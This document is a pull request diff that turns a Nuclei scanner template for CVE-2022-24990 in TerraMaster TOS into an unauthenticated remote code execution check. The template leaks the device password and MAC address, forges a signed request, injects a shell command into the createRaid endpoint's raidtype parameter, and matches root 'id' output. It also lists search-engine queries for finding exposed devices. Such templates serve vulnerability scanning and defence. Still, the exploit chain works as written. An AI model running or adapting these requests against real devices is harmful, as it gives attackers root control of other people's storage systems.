### PR TITLE
feat(cve): Add template for CVE-2022-24990

### DIFF
--- a/http/cves/2022/CVE-2022-24990.yaml
+++ b/http/cves/2022/CVE-2022-24990.yaml
@@ -1,63 +1,83 @@
 id: CVE-2022-24990
 
 info:
-  name: TerraMaster TOS < 4.2.30 Server Information Disclosure
-  author: dwisiswant0
-  severity: high
-  description: TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure.
+  name: TerraMaster TOS < 4.2.30 - Unauthenticated Remote Code Execution
+  author: iamnoooob,DhiyaneshDK
+  severity: critical
+  description: |
+    TerraMaster NAS versions through 4.2.30 contain a remote code execution caused by unsanitized parameters raidtype and diskstring in api.php?mobile/createRaid, letting WAN attackers execute arbitrary code as root, exploit requires remote network access and crafted parameters.
   impact: |
-    An attacker can exploit this vulnerability to gain sensitive information about the server, potentially leading to further attacks.
+    An attacker can execute arbitrary commands on the server, leading to a full compromise of the system.
   remediation: |
     Upgrade the TerraMaster TOS server to version 4.2.30 or later to mitigate the vulnerability.
   reference:
-    - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
-    - https://www.broadcom.com/support/security-center/attacksignatures/detail?asid=33732
-    - https://forum.terra-master.com/en/viewforum.php?f=28
-    - http://packetstormsecurity.com/files/172904/TerraMaster-TOS-4.2.29-Remote-Code-Execution.html
-    - https://github.com/ArrestX/--POC
+    - https://github.com/0xf4n9x/CVE-2022-24990
+    - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation
+    - https://packetstormsecurity.com/files/172904
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-24990
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 7.5
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2022-24990
-    cwe-id: CWE-306
+    cwe-id: CWE-78
     epss-score: 0.94401
     epss-percentile: 0.99970
     cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:*
   metadata:
-    max-request: 1
+    max-request: 2
     vendor: terra-master
     product: terramaster_operating_system
-    shodan-query:
-      - "TerraMaster"
-      - terramaster
-  tags: cve,cve2022,packetstorm,terramaster,exposure,kev,terra-master
+    shodan-query: 'TerraMaster'
+    fofa-query: app="TerraMaster-TOS"
+    google-query: intitle:"TOS"
+  tags: cve,cve2022,terramaster,rce,unauth,kev,terra-master
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/module/api.php?mobile/webNasIPS"
+  - raw:
+      - |
+        GET /module/api.php?mobile/webNasIPS HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: TNAS
 
-    headers:
-      User-Agent: "TNAS"
+    extractors:
+      - type: regex
+        name: pwd
+        group: 1
+        regex:
+          - 'PWD:([^\\]+)'
+        internal: true
+
+      - type: regex
+        name: mac
+        group: 1
+        regex:
+          - '\\"mac\\":\\"([a-zA-Z0-9:]+)\\"'
+        internal: true
+
+  - raw:
+      - |
+        POST /module/api.php?mobile/createRaid HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: TNAS
+        Timestamp: '{{unix_time}}'
+        Signature: '{{md5(substr(replace(mac, ":", ""), 6) + unix_time)}}'
+        Authorization: '{{pwd}}'
+        Content-Type: application/x-www-form-urlencoded
+
+        raidtype=;id;&diskstring=XXXX
 
     matchers-condition: and
     matchers:
-      - type: word
-        part: header
-        words:
-          - "application/json"
-          - "TerraMaster"
-        condition: and
-
       - type: regex
         part: body
         regex:
-          - "webNasIPS successful"
-          - "(ADDR|(IFC|PWD|[DS]AT)):"
-          - "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"
-        condition: or
+          - "uid=0\\(root\\) gid=0\\(root\\)"
+
+      - type: word
+        part: body
+        words:
+          - "createRaid successful"
 
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210092cc4beb1b612b9c4c33b99afd6d8354460526f7c11b61234b8c274677c8fc01022100df79e27d87bf64f62966302ff3ee26f8e9a4b58a8afa40f0752a1ac8cf3cb433:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
This adds a Nuclei template for CVE-2022-24990, a critical unauthenticated remote code execution vulnerability in TerraMaster TOS. The template chains the information disclosure (CVE-2022-24990) with the command injection (CVE-2022-24989) to provide a full proof of concept.

### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template Validation

I've validated this template locally?
- [ ] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)